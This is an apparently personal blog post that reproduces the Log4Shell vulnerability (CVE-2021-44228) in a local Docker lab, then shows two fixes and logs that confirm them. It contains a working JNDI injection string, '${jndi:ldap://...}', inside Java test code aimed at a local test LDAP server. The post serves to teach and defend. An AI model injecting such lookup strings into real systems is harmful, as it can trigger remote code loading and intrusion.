Connect with us

Infrastructure

How to reproduce CVE-2021-44228 (Log4J vulnerability), patch it, and validate the fix

Ethical Hacking: I am explaing this so that more people can understand whats going on and protect them.

Please do not harm others.

Thought of working on it yesterday night, but I had three important events.

  • There was a Christmas Party, and my kids brought me there.
  • The Party is over at 8 PM, but me and Johan practiced piano notes for “Believer”. Since Johan has classes today, he went to bed after the practice, at 9:30
  • But, Jadon wanted me to read books and tell him stories. After reading 5 books and more than 10 stories, finally he slept. It was at 12:30 when me and Jadon Slept

Woke up to a nightmare at 4 and could not go back to sleep. Then, I did some video editing and published my Kids Turtleback zoo video on youtube.

Finally, I had some time and started working on this.

In this article I discuss how to reproduce the CVE-2021-44228, Log4J Vulnerability, patch it and validate the fix.

I was crafting my own JNDI LDAP server, and I had the JNDI server ready. The next bit was integrating it with an LDAP server. Then, I set up OpenLDAP and am about to configure the LDAP. This is the first time I am setting up an LDAP server and realized I am going through the OpenLDAP docs. So, I ran a google search and found a nice LDAP server, specifically crafted to test this vulnerability and it simplified my work.

Acknowledgment:

LDAP Server: Standalone

The test LDAP Server can be run as a docker container. This container sets up an LDAP server.

docker run -i -p 1389:1389 vivasaayi/jndi-ldap-test-server:0.0.1

The test LDAP Server had an endpoint that will return a malicious string.

Precheck: Check if you have vulnerable Log4J jars.

You can use the below code to exploit the vulnerability.

import com.sun.org.apache.xpath.internal.objects.XString;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;

public class Log4JExploit {
    static Logger logger = LogManager.getLogger(Log4JExploit.class);

    public static void main(String... args) {
        String javaVersion = "${java:version}";
        String ldapUrl = "${jndi:ldap://localhost:1389/Test}";

        System.out.println(javaVersion);
        logger.error(javaVersion);
        logger.error(ldapUrl);
        System.out.println("Exiting.");
    }
}

Run that code

# Updte the directory locations accordingly

javac -classpath /repo/libs/log4j-api-2.14.1.jar:/repo/libs/log4j-core-2.14.1.jar /repo/src/Log4JExploit.java

java -classpath /repo/libs/log4j-api-2.14.1.jar:/repo/libs/log4j-core-2.14.1.jar:/repo/src Log4JExploit

It will print output like this:


${java:version}
11:24:37.666 [main] ERROR Log4JExploit - Java version 1.8.0_312
11:24:37.669 [main] ERROR Log4JExploit - !!! VULNERABLE !!!
Exiting.

Process finished with exit code 0

Simple command to check the vulnerability

You can simply build and run the above two steps using below Docker-Compose.

git clone https://github.com/vivasaayi/log4jexploit.git
cd log4jexploit 
make build
make run

This is the output

(base) rajanp@rajanps-MBP log4jexploit % make run
docker-compose up
Starting log4jexploit_ldapserver_1 ... done
Recreating log4jexploit_localpow_1 ... done
Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1  | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:29:51Z","message":"Listening on 0.0.0.0:1389"}
localpow_1    | ${java:version}
localpow_1    | 16:29:52.886 [main] ERROR Log4JExploit - Java version 1.8.0_312
ldapserver_1  | {"level":"info","component":"ldap","event":"request","client_ip":"172.22.0.3:53900","request":{"type":"bind","auth_type":"simple","user":""},"time":"2021-12-17T16:29:52Z","message":"Incoming LDAP Bind Request"}
ldapserver_1  | {"level":"info","component":"ldap","event":"request","client_ip":"172.22.0.3:53900","request":{"type":"search","base_dn":"Test","filter":"(objectClass=*)","attributes":[],"time_limit":0},"time":"2021-12-17T16:29:52Z","message":"Incoming LDAP Search Request"}
localpow_1    | 16:29:52.890 [main] ERROR Log4JExploit - !!! VULNERABLE !!!
localpow_1    | Exiting.

FIX 1: Update the jars

I Updated Jars (log4j-api-2.16.0.jar) and it can be found in this folder: vivasaayi/log4jexploit at updated-log4j-versions (github.com)

Please download official log4j patch release for your production use.

To validate the fix, run


docker-compose down
git checkout updated-log4j-versions
git pull
make build
make run

Now you will not see the vulnerability.

Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1  | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:34:08Z","message":"Listening on 0.0.0.0:1389"}
localpow_1    | ${java:version}
localpow_1    | 16:34:09.866 [main] ERROR Log4JExploit - ${java:version}
localpow_1    | 16:34:09.869 [main] ERROR Log4JExploit - ${jndi:ldap://ldapserver:1389/Test}
localpow_1    | Exiting.
log4jexploit_localpow_1 exited with code 0

Fix 2: Remove JNDI lookup class

This is in this branch: log4jexploit/libs at repack-log4j · vivasaayi/log4jexploit (github.com)

This is the script that patches the old log4j jars. (I already ran the patch)

cd libs

echo "Patching log4j-core-*.."
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

To validate,

docker-compose down
git checkout repack-log4j
git pull
make build
make run
(base) rajanp@rajanps-MBP log4jexploit % make run
docker-compose up
Creating network "log4jexploit_default" with the default driver
Creating log4jexploit_ldapserver_1 ... done
Creating log4jexploit_localpow_1   ... done
Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1  | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:37:15Z","message":"Listening on 0.0.0.0:1389"}
localpow_1    | ${java:version}
localpow_1    | 16:37:16.797 [main] ERROR Log4JExploit - Java version 1.8.0_312
localpow_1    | 16:37:16.801 [main] ERROR Log4JExploit - ${jndi:ldap://ldapserver:1389/Test}
localpow_1    | Exiting.
log4jexploit_localpow_1 exited with code 0

Final Notes:

If you are on AWS there are other patches available. I will continue to work on them and provide updates in my blog.

Ethical Hacking: I am explaing this so that more people can understand whats going on and protect them.

Continue Reading

Trending

Copyright © 2021 Rajan Panneer Selvam. Some of the content is derived from publically available information. For some of the resources I have obtained commercial licenses and you cannot use them in your projects. Before reusing any of the site content, please double-check for copyright issues. I am not responsible if you are infringing copyrights.